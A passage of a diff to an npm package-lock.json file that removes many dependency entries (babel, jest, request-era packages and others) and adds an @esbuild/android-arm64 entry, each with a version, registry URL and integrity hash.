"sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "requires": { - "safer-buffer": "~2.1.0" - } - }, - "assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==" - }, - "asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" - }, - "aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==" - }, - "aws4": { - "version": "1.12.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", - "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" - }, - "babel-jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.6.1.tgz", - "integrity": "sha512-qu+3bdPEQC6KZSPz+4Fyjbga5OODNcp49j6GKzG1EKbkfyJBxEYGVUmVGpwCSeGouG52R4EgYMLb6p9YeEEQ4A==", - "dev": true, - "requires": { - "@jest/transform": "^29.6.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.5.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - } - }, - "babel-plugin-jest-hoist": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.5.0.tgz", - "integrity": "sha512-zSuuuAlTMT4mzLj2nPnUm6fsE6270vdOfnpbJ+RmruU75UhLFvL0N2NgI7xpeS7NaB6hGqmd5pVpGTDYvi4Q3w==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - } - }, - "babel-preset-jest": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.5.0.tgz", - "integrity": "sha512-JOMloxOqdiBSxMAzjRaH023/vvcaSaec49zvg+2LmNsktC7ei39LTJGw02J+9uUtTZUq6xbLyJ4dxe9sSmIuAg==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.5.0", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", - "requires": { - "tweetnacl": "^0.14.3" - } - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "requires": { - "fill-range": "^7.1.1" - } - }, - "browserslist": { - "version": "4.21.9", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.9.tgz", - "integrity": "sha512-M0MFoZzbUrRU4KNfCrDLnvyE7gub+peetoTid3TBIqtunaDJyXlwhakT+/VkvSXcfIzFfK/nkCs4nmyTmxdNSg==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001503", - "electron-to-chromium": "^1.4.431", - "node-releases": "^2.0.12", - "update-browserslist-db": "^1.0.11" - } - }, - "bs-logger": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", - "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", - "dev": true, - "requires": { - "fast-json-stable-stringify": "2.x" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha512-s6webAy+R4SR8XVuJWt2V2rGvhnrhxN+9S15GNuTK3wKPOXFF6RNc+8ug2XhH+2s4f+uudG4kUVYmYOQWL2g0Q==" - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001515", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001515.tgz", - "integrity": "sha512-eEFDwUOZbE24sb+Ecsx3+OvNETqjWIdabMy52oOkIgcUtAsQifjUG9q4U9dgTHJM2mfk4uEPxc0+xuFdJ629QA==", - "dev": true - }, - "caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "chownr": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-2.0.0.tgz", - "integrity": "sha512-bIomtDF5KGpdogkLd9VspvFzk9KfpyyGlS8YFVZl7TGPBHL5snIOnxeshwVgPteQ9b4Eydl+pVbIyE1DcvCWgQ==" - }, - "ci-info": { - "version": "3.8.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "requires": { - "delayed-stream": "~1.0.0" - } - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" - }, - "cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "requires": { - "ms": "2.1.2" - } - }, - "dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true - }, - "delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "diff-sequences": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.4.3.tgz", - "integrity": "sha512-ofrBgwpPhCD85kMKtE9RYFFq6OC1A89oW2vvgWZNCwxrUpRUILopY7lsYyMDSjc8g6U6aiO0Qubg6r4Wgt5ZnA==", - "dev": true - }, - "ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", - "requires": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - }, - "dependencies": { - "jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" - } - } - }, - "electron-to-chromium": { - "version": "1.4.455", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.455.tgz", - "integrity": "sha512-8tgdX0Odl24LtmLwxotpJCVjIndN559AvaOtd67u+2mo+IDsgsTF580NB+uuDCqsHw8yFg53l5+imFV9Fw3cbA==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true - }, - "escape-string-regexp": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-4.0.0.tgz", - "integrity": "sha512-TtpcNJ3XAzx3Gq8sWRzJaVajRs0uVxA2YAkdb1jm2YkPz4G6egUFAyA3n5vtEIZefPk5Wa4UXbKuS5fKkJWdgA==" - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-XEdDLonERCU1n9uR56/Stx9OqojaLAQtZf9PrCHH9Hl8YXiEIka3H4NXJ3NOIBmQJTg7+j7buh34PMHfJujc8g==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.6.1", - "@types/node": "*", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==" - }, - "fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==" - }, - "form-data": { - "version": "2.5.1", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.1.tgz", - "integrity": "sha512-m21N3WOmEEURgk6B9GLOE4RuWOFf28Lhh9qGYeNlGq4VDXUlJy2th2slBNU8Gp8EzloYZOibZJ7t5ecIrFSjVA==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - }, - "fs-minipass": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", - "integrity": "sha512-V/JgOLFCS+R6Vcq0slCuaeWEdNC3ouDlJMNIsacH2VtALiu9mV4LPrHc5cDl8k5aw6J8jwgWWpiTo5RYhmIzvg==", - "requires": { - "minipass": "^3.0.0" - }, - "dependencies": { - "minipass": { - "version": "3.3.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", - "integrity": "sha512-DxiNidxSEK+tHG6zOIklvNOwm3hvCrbUrdtzY74U6HKTJxvIDfOUL5W5P2Ghd3DTkhhKPYGqeNUIh5qcM4YBfw==", - "requires": { - "yallist": "^4.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" - } - } - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", + "@esbuild/android-arm64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.25.5.tgz", + "integrity": "sha512-VGzGhj4lJO+TVGV1v8ntCZWJktV7SGCs3Pn1GRWI1SBFtRALoomm8k5E9Pmwg3HOAal2VDc2F9+PM/rEY6oIDg==", "dev": true, "optional": true }, - "function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true - }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true - }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true - }, - "get-stream": { - "version": "6.0.1", - "resolved": 